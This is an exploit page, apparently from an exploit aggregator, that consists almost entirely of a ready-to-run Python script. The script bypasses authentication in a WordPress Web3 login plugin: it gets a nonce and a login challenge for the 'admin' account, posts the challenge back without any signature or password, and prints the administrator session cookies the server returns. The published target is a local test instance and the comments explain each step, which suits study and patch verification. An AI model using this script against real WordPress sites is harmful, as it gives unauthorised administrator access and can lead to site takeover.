## https://sploitus.com/exploit?id=WPEX-ID:7F30AB20-805B-422C-A9A5-21D39C570EE4
Run the following Python script. As published, it targets a local test instance at `http://localhost:8083` and the `admin` account:
```python
import requests
import re
# Base URL of the WordPress site the script talks to. As published this is a
# local test instance.
URL_BASE = "http://localhost:8083"
# Path of the WordPress login page, relative to URL_BASE.
LOGIN_PATH = "/wp-login.php"
# WordPress login name that the requests below send in their "address" field.
USERNAME = "admin"
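def get_login_page():
    """Fetch the WordPress login page without credentials.

    Returns:
        A ``(cookies, nonce)`` tuple: the cookie jar of the response and the
        ``wp_nonce`` value that ``extract_nonce`` finds in the page body.

    Raises:
        ValueError: if the page body carries no ``wp_nonce`` value.
        requests.RequestException: on connection failure or timeout.
    """
    # Build the URL from LOGIN_PATH rather than repeating the literal path.
    # requests applies no timeout by default, so bound the wait explicitly.
    response = requests.get(f"{URL_BASE}{LOGIN_PATH}", timeout=10)
    # The nonce comes from a page served to any unauthenticated visitor, so
    # holding it proves nothing about who the caller is.
    nonce = extract_nonce(response.text)
    return response.cookies, nonce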
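def extract_nonce(html_content):
    """Return the ``wp_nonce`` value embedded in *html_content*.

    The value is looked up as a ``"wp_nonce":"..."`` pair. The first match
    wins, and the capture is non-greedy, ending at the next double quote.
    The value found is also echoed to stdout.

    Args:
        html_content: body of the login page, as text.

    Returns:
        The nonce string.

    Raises:
        ValueError: if no ``wp_nonce`` pair is present.
    """
    match = re.search(r'\"wp_nonce\":\"(.*?)\"', html_content)
    if match is None:
        raise ValueError("Nonce not found in the HTML content.")
    nonce = match.group(1)
    print("Website nonce:", nonce)
    return nonce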
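def post_data(cookies, nonce):
    """Request a login challenge for USERNAME and return the challenge string.

    Sends a POST to ``/wp-admin/admin-ajax.php`` with no credentials. For log
    review, the request body carries ``action=type_of_request`` and
    ``request=login``, and the response body contains ``Random string: ``
    followed by the challenge.

    Args:
        cookies: cookie jar obtained from the login page.
        nonce: ``wp_nonce`` value obtained from the login page.

    Returns:
        The challenge string found by ``extract_random_string``.

    Raises:
        ValueError: if the response contains no challenge string.
        requests.RequestException: on connection failure or timeout.
    """
    payload = {
        "action": "type_of_request",
        "request": "login",
        # The "address" field is filled with a WordPress login name here.
        "address": USERNAME,
        "mo_web3_verify_nonce": nonce,
    }
    # requests applies no timeout by default, so bound the wait explicitly.
    response = requests.post(
        f"{URL_BASE}/wp-admin/admin-ajax.php",
        data=payload,
        cookies=cookies,
        timeout=10,
    )
    return extract_random_string(response.text)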
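def extract_random_string(response_content):
    r"""Return the challenge that follows ``Random string: `` in the response.

    The capture is ``\w+``, so it stops at the first character that is not a
    letter, digit or underscore. The value found is also echoed to stdout.

    Args:
        response_content: body of the AJAX response, as text.

    Returns:
        The challenge string.

    Raises:
        ValueError: if the marker is absent from *response_content*.
    """
    match = re.search(r'Random string: (\w+)', response_content)
    if match is None:
        raise ValueError("Random string not found in the response content.")
    challenge = match.group(1)
    print("User nonce:", challenge)
    return challenge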
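def post_with_random_string(cookies, nonce, random_string):
    """Send the challenge string back and return the cookies the server sets.

    The request body holds three fields only: ``address``, ``nonce`` and
    ``mo_web3_hiddenform_nonce``. It contains no signature over the challenge.
    Every value is either a constant of this script or something the server
    handed out in the two earlier responses.

    NOTE(review): the page does not state what the returned cookies grant.
    A handler for this step should presumably require proof tied to the
    challenge before issuing any cookie; confirm against the plugin's fix.

    Args:
        cookies: cookie jar obtained from the login page.
        nonce: ``wp_nonce`` value obtained from the login page.
        random_string: challenge returned by the previous AJAX request.

    Returns:
        The cookie jar of the immediate response.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    payload = {
        "address": USERNAME,
        "nonce": random_string,
        "mo_web3_hiddenform_nonce": nonce,
    }
    # Redirects are not followed, so response.cookies holds the cookies set by
    # this response itself. requests applies no timeout by default, so bound
    # the wait explicitly.
    response = requests.post(
        f"{URL_BASE}/wp-admin/admin-ajax.php",
        data=payload,
        cookies=cookies,
        allow_redirects=False,
        timeout=10,
    )
    return response.cookies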
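def print_cookies(cookies_jar):
    """Print every cookie in *cookies_jar* as ``name: value``, one per line.

    Cookie values are written to stdout in clear, so captured output should
    be handled as sensitive.

    Args:
        cookies_jar: iterable of objects exposing ``name`` and ``value``.
    """
    for cookie in cookies_jar:
        print(f"{cookie.name}: {cookie.value}")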
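def main():
    """Run the three requests in order and print the cookies from the last.

    1. GET the login page to obtain its cookies and the ``wp_nonce`` value.
    2. POST the login request to obtain the challenge string.
    3. POST the challenge string back and collect the response cookies.

    No password and no signature is supplied at any step.
    """
    cookies, nonce = get_login_page()
    random_string = post_data(cookies, nonce)
    new_cookies = post_with_random_string(cookies, nonce, random_string)
    print("----------------")
    print("Cookies:")
    print_cookies(new_cookies)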
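# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()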
```